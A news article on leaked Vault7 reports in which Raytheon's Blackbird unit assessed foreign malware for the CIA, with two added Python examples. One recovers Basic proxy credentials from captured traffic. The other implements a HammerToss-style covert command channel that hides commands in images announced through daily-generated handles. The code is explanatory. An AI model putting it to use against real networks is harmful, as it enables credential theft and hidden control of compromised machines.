The CIA’s cozy malware relationship with defense contractor revealed
The new documents, released as part of WikiLeaks’ CIA hacking Vault7 series, show that Raytheon worked as a CIA contractor reporting to the spy agency’s Remote Development Branch’s UMBRAGE group.
Raytheon reported to the CIA about malware thought to have come from foreign governments, like Russia and China.
Raytheon is a defense contractor specializing in homeland security and defense technology, and is the company behind the Tomahawk missiles fired at Syria by President Trump.
Previous Vault7 documents revealed that UMBRAGE collects hacking techniques and exploits used by other countries, which lets the agency disguise its own operations as the work of those actors.
The trail starts from November 2014, two weeks after Raytheon had acquired Blackbird Technologies.
At the time, it said Blackbird would expand its “special operations capabilities in tactical intelligence, surveillance and reconnaissance, secure tactical communications and cybersecurity.”
Blackbird Technologies was a cyber security and surveillance company that supplied equipment for covert “tagging, tracking and locating” and counted US Special Operations Command as one of its biggest customers.
In 2011, a retired special operator described Blackbird Technologies’ work as being “heavily weighted towards the dark side.”
The documents included are assessments of malware, partly based on public documents from security researchers and private companies. Blackbird recommended whether the CIA should use the malware to develop its own projects.
NfLog - Remote Access Tool by Samurai Panda
A September 2015 report, titled “IsSpace used by SAMURAI PANDA,” covers a new variant of the NfLog Remote Access Tool (RAT) – a tool that gives an intruder administrative control over a target. It details how the malware, credited to the Chinese hacking group Samurai Panda, communicates with its command-and-control (C2) servers and sniffs user credentials.
On systems with a Windows Firewall “it will attempt to enumerate the basic authorization username and password used for most proxy authentications using HTTP.”
If NfLog sees a user has administrative privileges, it will attempt to give itself increased permissions.
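The “basic authorization username and password” the report refers to is HTTP Basic authentication, in which the proxy credentials travel as a base64-encoded `user:password` string in a `Proxy-Authorization` header. Base64 is an encoding, not encryption, so anything that can read the request (or the stored proxy settings) recovers the credentials. The following added example, written for this page and not taken from the leaked report or the malware, parses constructed sample traffic and recovers Basic proxy credentials while skipping schemes such as NTLM that do not expose the password directly. The hostnames, credentials and requests are constructed for the demo.

```python
"""Recover HTTP Basic proxy credentials from captured plaintext traffic.

Added example, not code from the leaked report or the malware: it shows why
the "basic authorization username and password" used for proxy authentication
is recoverable by anything that can read the wire. All sample requests below
are constructed for the demonstration.
"""
import base64
import binascii
import re

# Constructed sample: three requests through a corporate proxy. The first uses
# Basic auth, the second NTLM (a challenge/response scheme, no password on the
# wire), and the third carries a corrupted Basic token.
SAMPLE_TRAFFIC = (
    b"GET http://intranet.example.test/ HTTP/1.1\r\n"
    b"Host: intranet.example.test\r\n"
    b"Proxy-Authorization: Basic YWxpY2U6aHVudGVyMg==\r\n"
    b"\r\n"
    b"GET http://intranet.example.test/x HTTP/1.1\r\n"
    b"Host: intranet.example.test\r\n"
    b"Proxy-Authorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==\r\n"
    b"\r\n"
    b"GET http://intranet.example.test/y HTTP/1.1\r\n"
    b"Host: intranet.example.test\r\n"
    b"Proxy-Authorization: Basic not*valid*base64\r\n"
    b"\r\n"
)

# One header per line: scheme token, whitespace, credential token.
HEADER_RE = re.compile(
    rb"^Proxy-Authorization:\s*(\S+)\s+(\S+)\s*$", re.IGNORECASE | re.MULTILINE
)


def proxy_auth_schemes(traffic):
    """Return the lowercase auth scheme of every Proxy-Authorization header seen."""
    return [scheme.decode("ascii", "replace").lower()
            for scheme, _token in HEADER_RE.findall(traffic)]


def extract_basic_proxy_credentials(traffic):
    """Return (username, password) for every decodable Basic Proxy-Authorization header.

    Non-Basic schemes are skipped: NTLM/Negotiate exchange hashes, not the
    cleartext password, so a passive sniffer learns nothing directly from them.
    Malformed base64 is skipped rather than raising, so one bad header does not
    abort processing of a whole capture.
    """
    found = []
    for scheme, token in HEADER_RE.findall(traffic):
        if scheme.lower() != b"basic":
            continue
        try:
            decoded = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue
        user, sep, password = decoded.partition(b":")
        if not sep:  # RFC 7617 requires the colon separator
            continue
        found.append((user.decode("utf-8", "replace"),
                      password.decode("utf-8", "replace")))
    return found


if __name__ == "__main__":
    print("schemes seen:", proxy_auth_schemes(SAMPLE_TRAFFIC))
    for user, password in extract_basic_proxy_credentials(SAMPLE_TRAFFIC):
        print(f"recovered proxy credential: {user}:{password}")
```

The defensive takeaway is the mirror image of what the malware does: if a proxy offers Basic authentication over plain HTTP, treat the proxy password as already disclosed to any process or network position that can observe the request.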
HTTPBrowser by Emissary Panda
Another September 2015 document details a new variant of the HTTPBrowser Remote Access Tool used by Emissary Panda, thought to be another Chinese hacking group.
The RAT is deployed through an “unknown initial attack vector,” the document reads. It contains a self-extracting zip file which includes three files used to deploy the malware.
It captures keystrokes and writes them to a file in clear text. The document cites that lack of encryption as an indication of the RAT’s “low level of sophistication” and says it contains no new techniques worth a proof of concept (PoC).
Regin - Stealthy Surveillance
Regin is described as a “very sophisticated malware sample” that has been observed in operation since 2013, but the September 2015 document adds that it may have been in use since 2008. The complex malware has been linked to GCHQ and the NSA.
The “target surveillance and data collection” malware is deployed in six stages.
The report’s author appears impressed by Regin, commending its “striking” modular architecture, its “flexibility” and its stealth.
Regin allows attacks to be tailored to different targets and has the ability to “hide itself from discovery.”
The report notes that it lacks details on how some aspects of Regin are implemented. “We assume bad actors have valid certs [for driver signing] but it’s not clear from the report,” it says.
Regin was discovered by Symantec, which described it as a trojan data collection tool that can take “screenshots and [take] control of the mouse’s point-and-click functions, steal passwords, monitor network traffic,” and scan for deleted files.
Symantec found it was likely created by a nation state.
HammerToss - Stealthy Tactics by Russians
A September 2015 report details HammerToss, a “suspected Russian State-sponsored malware” which leverages Twitter accounts, GitHub and cloud storage to “orchestrate command and control functions.”
HammerToss uses an algorithm to compute a new Twitter handle each day. The attacker registers that account and posts a tweet containing a URL and a hashtag; the URL points the malware to an image hosted on GitHub, which it downloads and from which it extracts its commands.
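The scheme described above, modelled end to end as an added example written for this page (it is not HammerToss’s code and not code from the report). The real implant’s handle-generation algorithm, tweet format and image encoding are not given on this page, so the following are assumptions chosen for illustration: the handle is derived from the date with an HMAC over a shared seed, the hashtag carries a decimal byte offset followed by an XOR key, and the encoded command is appended to a PNG at that offset. Both the operator side (building the image and tweet) and the implant side (computing the handle, parsing the tweet, decoding the command) are shown.

```python
"""Model of a HammerToss-style C2 channel: daily handle, tweet, image payload.

Added example, not the malware's or the report's code. The handle derivation,
hashtag format and payload layout are assumptions for illustration; the real
implant's algorithms are not described on this page. All sample values are
constructed for the demo.
"""
import datetime
import hashlib
import hmac
import re

SEED = b"demo-seed"  # assumption: secret baked into the implant and known to the operator
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Tweet text: an image URL followed by a hashtag. Hashtag format (assumed):
# decimal byte offset into the image, then the XOR key as letters, e.g. #64xyz
TWEET_RE = re.compile(r"(https?://\S+)\s+#(\d+[A-Za-z]+)\b")
HASHTAG_RE = re.compile(r"^(\d+)([A-Za-z]+)$")


def daily_handle(day, seed=SEED):
    """Handle both sides compute for a given date (hypothetical 'user' + 8 hex chars)."""
    digest = hmac.new(seed, day.isoformat().encode(), hashlib.sha256).hexdigest()
    return "user" + digest[:8]


def xor_bytes(data, key):
    """Repeating-key XOR; the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# ---- operator side -----------------------------------------------------------

def build_operator_image(command, key, offset):
    """Build the image the operator uploads: PNG signature, filler, XOR-encoded command."""
    if offset < len(PNG_SIGNATURE):
        raise ValueError("offset must leave the PNG signature intact")
    filler = b"\x00" * (offset - len(PNG_SIGNATURE))
    return PNG_SIGNATURE + filler + xor_bytes(command, key)


def build_operator_tweet(image_url, key, offset):
    """Compose the tweet that points the implant at the image."""
    return f"check this out {image_url} #{offset}{key.decode('ascii')}"


# ---- implant side ------------------------------------------------------------

def parse_tweet(text):
    """Return (image_url, hashtag) from an operator tweet, or None if absent."""
    m = TWEET_RE.search(text)
    return (m.group(1), m.group(2)) if m else None


def extract_command(image, hashtag):
    """Decode the command from the downloaded image using the hashtag's offset and key."""
    if not image.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    m = HASHTAG_RE.match(hashtag)
    if not m:
        raise ValueError("hashtag does not carry offset+key")
    offset, key = int(m.group(1)), m.group(2).encode("ascii")
    if offset >= len(image):
        raise ValueError("offset beyond image end")
    return xor_bytes(image[offset:], key)


def run_exchange(day, command, key=b"xyz", offset=64):
    """Walk one day's exchange and return the command the implant recovers."""
    handle = daily_handle(day)                       # implant knows whom to look for
    image = build_operator_image(command, key, offset)
    tweet = build_operator_tweet(f"https://img.example.test/{handle}.png", key, offset)
    url, tag = parse_tweet(tweet)                    # implant reads the account's tweet
    downloaded = image                               # stands in for fetching `url`
    return extract_command(downloaded, tag)


if __name__ == "__main__":
    today = datetime.date(2015, 9, 1)
    print("handle for", today, "is", daily_handle(today))
    print("implant recovered:", run_exchange(today, b"whoami"))
```

The detection angle follows directly from the model: the implant never contacts an attacker-owned server, so network defences must look at the behaviour (a process that resolves a new social-media handle every day and pulls images from a code-hosting site) rather than at any fixed indicator.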
Gamker - Information Stealer
Gamker is described as an information-stealing Trojan that decrypts its stolen data with a simple routine and injects itself into another process.
Trojan malware is often disguised as regular software. Because Gamker injects its code into another running process, nothing is written to disk. The report doesn’t say who is suspected of creating Gamker.